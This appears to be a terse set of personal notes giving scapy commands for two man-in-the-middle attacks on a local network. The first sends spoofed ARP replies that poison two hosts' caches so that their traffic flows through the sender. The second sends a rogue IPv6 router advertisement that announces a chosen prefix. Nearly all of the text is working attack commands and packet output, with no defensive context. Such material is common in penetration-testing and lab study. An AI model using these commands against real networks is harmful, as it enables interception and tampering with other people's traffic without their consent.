https://github.com/secdev/scapy - scapy git

MitM ARP Cache         https://scapy.net/conf/scapy_hack.lu.pdf
z=Ether()
a=ARP()
a.psrc="172.16.82.126"
a.pdst="172.16.82.115"
>>> a.show()
###[ ARP ]### 
  hwtype    = 0x1
  ptype     = IPv4
  hwlen     = None
  plen      = None
  op        = who-has
  hwsrc     = fa:16:3e:a2:90:c8
  psrc      = 172.16.82.126
  hwdst     = 00:00:00:00:00:00
  pdst      = 172.16.82.115
b=ARP()
b.psrc="172.16.82.115"
b.pdst="172.16.82.126"
>>> b.show()
###[ ARP ]### 
  hwtype    = 0x1
  ptype     = IPv4
  hwlen     = None
  plen      = None
  op        = who-has
  hwsrc     = fa:16:3e:a2:90:c8
  psrc      = 172.16.82.115
  hwdst     = 00:00:00:00:00:00
  pdst      = 172.16.82.126
sendp(z/a)
sendp(z/b)
---------------------------------------------------------------------------------
IPv6 SLAAC MitM
a=IPv6()
b=ICMPv6ND_RA()
c=ICMPv6NDOptSrcLLAddr()
c.lladdr="fa:16:3e:a2:90:c8" (My MAC)
d=ICMPv6NDOptMTU()
e=ICMPv6NDOptPrefixInfo()
e.prefix="fd00:deaf:cafe::" (Given target)
e.prefixlen=64
send(a/b/c/d/e)







